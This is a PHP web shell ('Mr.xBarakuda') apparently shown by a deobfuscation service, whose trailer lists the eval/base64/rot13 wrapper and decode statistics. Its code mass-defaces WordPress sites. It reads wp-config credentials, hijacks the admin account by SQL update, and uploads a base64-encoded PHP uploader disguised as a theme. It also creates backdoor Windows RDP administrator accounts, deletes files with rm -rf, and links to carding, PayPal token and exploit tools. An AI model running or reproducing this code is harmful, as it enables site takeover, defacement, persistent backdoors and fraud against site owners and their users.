                  curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
                  curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
                  curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
                  curl_setopt($ch, CURLOPT_COOKIESESSION, true);
            $data = curl_exec($ch);
                  curl_close($ch);
            return $data;
        }
        function lohgin($cek, $web, $userr, $pass, $wp_submit) {
            $post = array(
                   "log" => "$userr",
                   "pwd" => "$pass",
                   "rememberme" => "forever",
                   "wp-submit" => "$wp_submit",
                   "redirect_to" => "$web",
                   "testcookie" => "1",
                   );
            $ch = curl_init($cek);
                  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                  curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
                  curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
                  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
                  curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
                  curl_setopt($ch, CURLOPT_POST, 1);
                  curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
                  curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
                  curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
                  curl_setopt($ch, CURLOPT_COOKIESESSION, true);
            $data = curl_exec($ch);
                  curl_close($ch);
            return $data;
        }
        $scan = $_POST['link_config'];
        $link_config = scandir($scan);
        $script = htmlspecialchars($_POST['script']);
        $user = "mrxbarakuda";
        $pass = "mrxbarakuda";
        $passx = md5($pass);
        foreach($link_config as $dir_config) {
            if(!is_file("$scan/$dir_config")) continue;
            $config = file_get_contents("$scan/$dir_config");
            if(preg_match("/WordPress/", $config)) {
                $dbhost = ambilkata($config,"DB_HOST', '","'");
                $dbuser = ambilkata($config,"DB_USER', '","'");
                $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
                $dbname = ambilkata($config,"DB_NAME', '","'");
                $dbprefix = ambilkata($config,"table_prefix  = '","'");
                $prefix = $dbprefix."users";
                $option = $dbprefix."options";
                $conn = mysql_connect($dbhost,$dbuser,$dbpass);
                $db = mysql_select_db($dbname);
                $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
                $result = mysql_fetch_array($q);
                $id = $result[ID];
                $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
                $result2 = mysql_fetch_array($q2);
                $target = $result2[option_value];
                if($target == '') {
                    echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
                } else {
                    echo "[+] $target <br>";
                }
                $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
                if(!$conn OR !$db OR !$update) {
                    echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
                    mysql_close($conn);
                } else {
                    $site = "$target/wp-login.php";
                    $site2 = "$target/wp-admin/theme-install.php?upload";
                    $b1 = anucurl($site2);
                    $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"\",\"\" />");
                    $b = lohgin($site, $site2, $user, $pass, $wp_sub);
                    $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"\",\"\" />");
                    $upload3 = base64_decode("PD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQokbmV3ZmlsZTM9ImsucGhwIjsNCmlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCm1vdmVfdXBsb2FkZWRfZmlsZSgkZmlsZTNbJ3RtcF9uYW1lJ10sICIuLi8uLi8uLi8uLi8kbmV3ZmlsZTMiKTsNCj8+");
                    $www = "m.php";
                    $fp5 = fopen($www,"w");
                    fputs($fp5,$upload3);
                    $post2 = array(
                            "_wpnonce" => "$anu2",
                            "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
                            "themezip" => "@$www",
                            "install-theme-submit" => "Install Now",
                            );
                    $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
                          curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                          curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
                          curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
                          curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
                          curl_setopt($ch, CURLOPT_POST, 1);
                          curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
                          curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
                          curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
                          curl_setopt($ch, CURLOPT_COOKIESESSION, true);
                    $data3 = curl_exec($ch);
                          curl_close($ch);
                    $y = date("Y");
                    $m = date("m");
                    $namafile = "id.php";
                    $fpi = fopen($namafile,"w");
                    fputs($fpi,$script);
                    $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
                           curl_setopt($ch6, CURLOPT_POST, true);
                           curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
                           curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
                           curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
                           curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
                           curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
                    $postResult = curl_exec($ch6);
                           curl_close($ch6);
                    $as = "$target/k.php";
                    $bs = anucurl($as);
                    if(preg_match("#$script#is", $bs)) {
                        echo "[+] <font color='lime'>berhasil mepes...</font><br>";
                        echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
                        } else {
                        echo "[-] <font color='red'>gagal mepes...</font><br>";
                        echo "[!!] coba aja manual: <br>";
                        echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
                        echo "[+] username: <font color=lime>$user</font><br>";
                        echo "[+] password: <font color=lime>$pass</font><br><br>";
                        }
                    mysql_close($conn);
                }
            }
        }
    } else {
        echo "<center><h3>WordPress Auto Deface</h3>
        <form method='post'>
        <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
        <input type='text' name='script' height='10' size='50' placeholder='Visited By Mr.xBarakuda' required><br>
        <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
        </form>
        <br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
        </center>";
    }
}
elseif($_GET['do'] == 'auto_dwp2') {
    if($_POST['auto_deface_wp']) {
        function anucurl($sites) {
            $ch = curl_init($sites);
                  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                  curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
                  curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
                  curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
                  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
                  curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
                  curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
                  curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
                  curl_setopt($ch, CURLOPT_COOKIESESSION,true);
            $data = curl_exec($ch);
                  curl_close($ch);
            return $data;
        }
        function lohgin($cek, $web, $userr, $pass, $wp_submit) {
            $post = array(
                   "log" => "$userr",
                   "pwd" => "$pass",
                   "rememberme" => "forever",
                   "wp-submit" => "$wp_submit",
                   "redirect_to" => "$web",
                   "testcookie" => "1",
                   );
            $ch = curl_init($cek);
                  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                  curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
                  curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
                  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
                  curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
                  curl_setopt($ch, CURLOPT_POST, 1);
                  curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
                  curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
                  curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
                  curl_setopt($ch, CURLOPT_COOKIESESSION, true);
            $data = curl_exec($ch);
                  curl_close($ch);
            return $data;
        }
        $link = explode("
", $_POST['link']);
        $script = htmlspecialchars($_POST['script']);
        $user = "mrxbarakuda";
        $pass = "mrxbarakuda";
        $passx = md5($pass);
        foreach($link as $dir_config) {
            $config = anucurl($dir_config);
            $dbhost = ambilkata($config,"DB_HOST', '","'");
            $dbuser = ambilkata($config,"DB_USER', '","'");
            $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
            $dbname = ambilkata($config,"DB_NAME', '","'");
            $dbprefix = ambilkata($config,"table_prefix  = '","'");
            $prefix = $dbprefix."users";
            $option = $dbprefix."options";
            $conn = mysql_connect($dbhost,$dbuser,$dbpass);
            $db = mysql_select_db($dbname);
            $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
            $result = mysql_fetch_array($q);
            $id = $result[ID];
            $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
            $result2 = mysql_fetch_array($q2);
            $target = $result2[option_value];
            if($target == '') {
                echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
            } else {
                echo "[+] $target <br>";
            }
            $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
            if(!$conn OR !$db OR !$update) {
                echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
                mysql_close($conn);
            } else {
                $site = "$target/wp-login.php";
                $site2 = "$target/wp-admin/theme-install.php?upload";
                $b1 = anucurl($site2);
                $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"\",\"\" />");
                $b = lohgin($site, $site2, $user, $pass, $wp_sub);
                $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"\",\"\" />");
                $upload3 = base64_decode("PD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQokbmV3ZmlsZTM9ImsucGhwIjsNCmlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCm1vdmVfdXBsb2FkZWRfZmlsZSgkZmlsZTNbJ3RtcF9uYW1lJ10sICIuLi8uLi8uLi8uLi8kbmV3ZmlsZTMiKTsNCj8+");
                $www = "m.php";
                $fp5 = fopen($www,"w");
                fputs($fp5,$upload3);
                $post2 = array(
                        "_wpnonce" => "$anu2",
                        "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
                        "themezip" => "@$www",
                        "install-theme-submit" => "Install Now",
                        );
                $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
                      curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                      curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
                      curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
                      curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
                      curl_setopt($ch, CURLOPT_POST, 1);
                      curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
                      curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
                      curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
                      curl_setopt($ch, CURLOPT_COOKIESESSION, true);
                $data3 = curl_exec($ch);
                      curl_close($ch);
                $y = date("Y");
                $m = date("m");
                $namafile = "id.php";
                $fpi = fopen($namafile,"w");
                fputs($fpi,$script);
                $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
                       curl_setopt($ch6, CURLOPT_POST, true);
                       curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
                       curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
                       curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
                       curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
                       curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
                $postResult = curl_exec($ch6);
                       curl_close($ch6);
                $as = "$target/k.php";
                $bs = anucurl($as);
                if(preg_match("#$script#is", $bs)) {
                    echo "[+] <font color='lime'>berhasil mepes...</font><br>";
                    echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
                    } else {
                    echo "[-] <font color='red'>gagal mepes...</font><br>";
                    echo "[!!] coba aja manual: <br>";
                    echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
                    echo "[+] username: <font color=lime>$user</font><br>";
                    echo "[+] password: <font color=lime>$pass</font><br><br>";
                    }
                mysql_close($conn);
            }
        }
    } else {
        echo "<center><h3>WordPress Auto Deface V.2</h3>
        <form method='post'>
        Link Config: <br>
        <textarea name='link' placeholder='http://target.com/kuda_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
        <input type='text' name='script' height='10' size='50' placeholder='Visited By Mr.xBarakuda' required><br>
        <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
        </form></center>";
    }
} elseif($_GET['do'] == 'krdp_shell') {
    if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
        if($_POST['create']) {
            $user = htmlspecialchars($_POST['user']);
            $pass = htmlspecialchars($_POST['pass']);
            if(preg_match("/$user/", exe("net user"))) {
                echo "<center>[INFO] -> <font color=red>user <font color=lime>$user</font> sudah ada</font></center>";
            } else {
                $add_user   = exe("net user $user $pass /add");
                $add_groups1 = exe("net localgroup Administrators $user /add");
                $add_groups2 = exe("net localgroup Administrator $user /add");
                $add_groups3 = exe("net localgroup Administrateur $user /add");
                echo "[ RDP ACCOUNT INFO ]<br>
                ------------------------------<br>
                IP: <font color=lime>".$ip."</font><br>
                Username: <font color=lime>$user</font><br>
                Password: <font color=lime>$pass</font><br>
                ------------------------------<br><br>
                [ STATUS ]<br>
                ------------------------------<br>
                ";
                if($add_user) {
                    echo "[add user] -> <font color='lime'>Berhasil</font><br>";
                } else {
                    echo "[add user] -> <font color='red'>Gagal</font><br>";
                }
                if($add_groups1) {
                    echo "[add localgroup Administrators] -> <font color='lime'>Berhasil</font><br>";
                } elseif($add_groups2) {
                    echo "[add localgroup Administrator] -> <font color='lime'>Berhasil</font><br>";
                } elseif($add_groups3) {
                    echo "[add localgroup Administrateur] -> <font color='lime'>Berhasil</font><br>";
                } else {
                    echo "[add localgroup] -> <font color='red'>Gagal</font><br>";
                }
                echo "------------------------------<br>";
            }
        } elseif($_POST['s_opsi']) {
            $user = htmlspecialchars($_POST['r_user']);
            if($_POST['opsi'] == '1') {
                $cek = exe("net user $user");
                echo "Checking username <font color=lime>$user</font> ....... ";
                if(preg_match("/$user/", $cek)) {
                    echo "[ <font color=lime>Sudah ada</font> ]<br>
                    ------------------------------<br><br>
                    <pre>$cek</pre>";
                } else {
                    echo "[ <font color=red>belum ada</font> ]";
                }
            } elseif($_POST['opsi'] == '2') {
                $cek = exe("net user $user mrxbarakuda");
                if(preg_match("/$user/", exe("net user"))) {
                    echo "[change password: <font color=lime>mrxbarakuda</font>] -> ";
                    if($cek) {
                        echo "<font color=lime>Berhasil</font>";
                    } else {
                        echo "<font color=red>Gagal</font>";
                    }
                } else {
                    echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
                }
            } elseif($_POST['opsi'] == '3') {
                $cek = exe("net user $user /DELETE");
                if(preg_match("/$user/", exe("net user"))) {
                    echo "[remove user: <font color=lime>$user</font>] -> ";
                    if($cek) {
                        echo "<font color=lime>Berhasil</font>";
                    } else {
                        echo "<font color=red>Gagal</font>";
                    }
                } else {
                    echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
                }
            } else {
                //
            }
        } else {
            echo "-- Create RDP --<br>
            <form method='post'>
            <input type='text' name='user' placeholder='username' value='mrxbarakuda' required>
            <input type='text' name='pass' placeholder='password' value='mrxbarakuda' required>
            <input type='submit' name='create' value='>>'>
            </form>
            -- Option --<br>
            <form method='post'>
            <input type='text' name='r_user' placeholder='username' required>
            <select name='opsi'>
            <option value='1'>Cek Username</option>
            <option value='2'>Ubah Password</option>
            <option value='3'>Hapus Username</option>
            </select>
            <input type='submit' name='s_opsi' value='>>'>
            </form>
            ";
        }
    } else {
        echo "<font color=red>Fitur ini hanya dapat digunakan dalam Windows Server.</font>";
    }
} elseif($_GET['act'] == 'newfile') {
    if($_POST['new_save_file']) {
        $newfile = htmlspecialchars($_POST['newfile']);
        $fopen = fopen($newfile, "a+");
        if($fopen) {
            $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
        } else {
            $act = "<font color=red>permission denied</font>";
        }
    }
    echo $act;
    echo "<form method='post'>
    Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
    <input type='submit' name='new_save_file' value='Submit'>
    </form>";
} elseif($_GET['act'] == 'newfolder') {
    if($_POST['new_save_folder']) {
        $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
        if(!mkdir($new_folder)) {
            $act = "<font color=red>permission denied</font>";
        } else {
            $act = "<script>window.location='?dir=".$dir."';</script>";
        }
    }
    echo $act;
    echo "<form method='post'>
    Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
    <input type='submit' name='new_save_folder' value='Submit'>
    </form>";
} elseif($_GET['act'] == 'rename_dir') {
    if($_POST['dir_rename']) {
        $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
        if($dir_rename) {
            $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
        } else {
            $act = "<font color=red>permission denied</font>";
        }
    echo "".$act."<br>";
    }
    echo "<form method='post'>
    <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
    <input type='submit' name='dir_rename' value='rename'>
    </form>";
} elseif($_GET['act'] == 'delete_dir') {
    if(is_dir($dir)) {
        if(is_writable($dir)) {
            @rmdir($dir);
            @exe("rm -rf $dir");
            @exe("rmdir /s /q $dir");
            $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
        } else {
            $act = "<font color=red>could not remove ".basename($dir)."</font>";
        }
    }
    echo $act;
} elseif($_GET['act'] == 'view') {
    echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
    echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
} elseif($_GET['act'] == 'edit') {
    if($_POST['save']) {
        $save = file_put_contents($_GET['file'], $_POST['src']);
        if($save) {
            $act = "<font color=lime>Saved!</font>";
        } else {
            $act = "<font color=red>permission denied</font>";
        }
    echo "".$act."<br>";
    }
    echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
    echo "<form method='post'>
    <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
    <center><input type='submit' value='Save' name='save' style='width: 500px;'>
    </form>";
} elseif($_GET['act'] == 'rename') {
    if($_POST['do_rename']) {
        $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
        if($rename) {
            $act = "<script>window.location='?dir=".$dir."';</script>";
        } else {
            $act = "<font color=red>permission denied</font>";
        }
    echo "".$act."<br>";
    }
    echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
    echo "<form method='post'>
    <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
    <input type='submit' name='do_rename' value='rename'>
    </form>";
} elseif($_GET['act'] == 'delete') {
    $delete = unlink($_GET['file']);
    if($delete) {
        $act = "<script>window.location='?dir=".$dir."';</script>";
    } else {
        $act = "<font color=red>permission denied</font>";
    }
    echo $act;
} else {
    if(is_dir($dir) === true) {
        if(!is_readable($dir)) {
            echo "<font color=red>can't open directory. ( not readable )</font>";
        } else {
            echo '<table width="100%" class="table_home" border="1" cellpadding="3" cellspacing="1" align="center">
            <tr>
            <th class="th_home"><center>Name</center></th>
            <th class="th_home"><center>Type</center></th>
            <th class="th_home"><center>Size</center></th>
            <th class="th_home"><center>Last Modified</center></th>
            <th class="th_home"><center>Owner/Group</center></th>
            <th class="th_home"><center>Permission</center></th>
            <th class="th_home"><center>Action</center></th>
            </tr>';
            $scandir = scandir($dir);
            foreach($scandir as $dirx) {
                $dtype = filetype("$dir/$dirx");
                $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
                if(function_exists('posix_getpwuid')) {
                    $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
                    $downer = $downer['name'];
                } else {
                    //$downer = $uid;
                    $downer = fileowner("$dir/$dirx");
                }
                if(function_exists('posix_getgrgid')) {
                    $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
                    $dgrp = $dgrp['name'];
                } else {
                    $dgrp = filegroup("$dir/$dirx");
                }
                if(!is_dir("$dir/$dirx")) continue;
                if($dirx === '..') {
                    $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
                } elseif($dirx === '.') {
                    $href = "<a href='?dir=$dir'>$dirx</a>";
                } else {
                    $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
                }
                if($dirx === '.' || $dirx === '..') {
                    $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
                    } else {
                    $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
                }
                echo "<tr>";
                echo "<td class='td_home'><img src=''>$href</td>";
                echo "<td class='td_home'><center>$dtype</center></td>";
                echo "<td class='td_home'><center>-</center></th></td>";
                echo "<td class='td_home'><center>$dtime</center></td>";
                echo "<td class='td_home'><center>$downer/$dgrp</center></td>";
                echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
                echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
                echo "</tr>";
            }
        }
    } else {
        echo "<font color=red>can't open directory.</font>";
    }
        foreach($scandir as $file) {
            $ftype = filetype("$dir/$file");
            $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
            $size = filesize("$dir/$file")/1024;
            $size = round($size,3);
            if(function_exists('posix_getpwuid')) {
                $fowner = @posix_getpwuid(fileowner("$dir/$file"));
                $fowner = $fowner['name'];
            } else {
                //$downer = $uid;
                $fowner = fileowner("$dir/$file");
            }
            if(function_exists('posix_getgrgid')) {
                $fgrp = @posix_getgrgid(filegroup("$dir/$file"));
                $fgrp = $fgrp['name'];
            } else {
                $fgrp = filegroup("$dir/$file");
            }
            if($size > 1024) {
                $size = round($size/1024,2). 'MB';
            } else {
                $size = $size. 'KB';
            }
            if(!is_file("$dir/$file")) continue;
            echo "<tr>";
            echo "<td class='td_home'><img src=''><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
            echo "<td class='td_home'><center>$ftype</center></td>";
            echo "<td class='td_home'><center>$size</center></td>";
            echo "<td class='td_home'><center>$ftime</center></td>";
            echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
            echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
            echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
            echo "</tr>";
        }
      echo "</table>";
        if(!is_readable($dir)) {

        } else {
echo "<center><hr color=deepskyblue>
<form>
<select onchange='if (this.value) window.open(this.value);'>
<option selected='selected' value=''>Carder Tools</option>
<option value='$ling=extractor'>DB Email Extractor</option>
<option value='$ling=promailerv2'>Pro Mailer V2</option>     
<option value='$ling=bukalapak'>BukaLapak Checker</option>        
<option value='$ling=tokped'>TokoPedia Checker</option>  
<option value='$ling=tokenpp'>Paypal Token Generator</option>  
<option value='$ling=mailer'>Mailer</option>
</select>
<noscript><input type='submit' value='Submit'></noscript>
<select onchange='if (this.value) window.open(this.value);'>
<option selected='selected' value=''>Create Tools</option>
<option value='$ling=wso404'>WSO 404 Shell</option>
<option value='$ling=blackhat'>Blackhat Shell</option>
<option value='$ling=noname'>Noname Shell</option>
<option value='$ling=berandal'>Berandal Shell</option>
<option value='$ling=rootex'>Local Root Exploiter (No-Backconnect)</option>
<option value='$ling=sqlscan'>SQL Scanner (Bing Dorker)</option>
<option value='$ling=webdav'>Webdav Mass Exploiter</option>
<option value='$ling=shellshock'>Shell Shock Scanner</option>
<option value='$ling=webconsole'>Web Console</option>
<option value='$ling=iptrack'>IP Tracker</option>
<option value='$ling=lokmed'>Lokmed Auto Exploiter</option>
</select>
<noscript><input type='submit' value='Submit'></noscript>
</form>
</center>";
    }
echo "<center>Copyright &copy; ".date("Y")." <a href='https://instagram.com/x_barakuda' target='_blank'><font color=deepskyblue>".$gue."</a></font><font color=red> #</font><font color=white> Recoded From </font><font color=deepskyblue>All Indonesian Web Shell</font></center>";
}
?>
</body>
</html>

Did this file decode correctly?

Original Code

eval(strrev(str_rot13(gzuncompress(base64_decode(str_replace('xln', 'A', ''))))));

Function Calls

strrev 1
str_rot13 1
str_replace 1
gzuncompress 1
base64_decode 1

Variables

None

Stats

MD5 ea79680eed01c772878d54f91f719c5f
Eval Count 1
Decode Time 22354 ms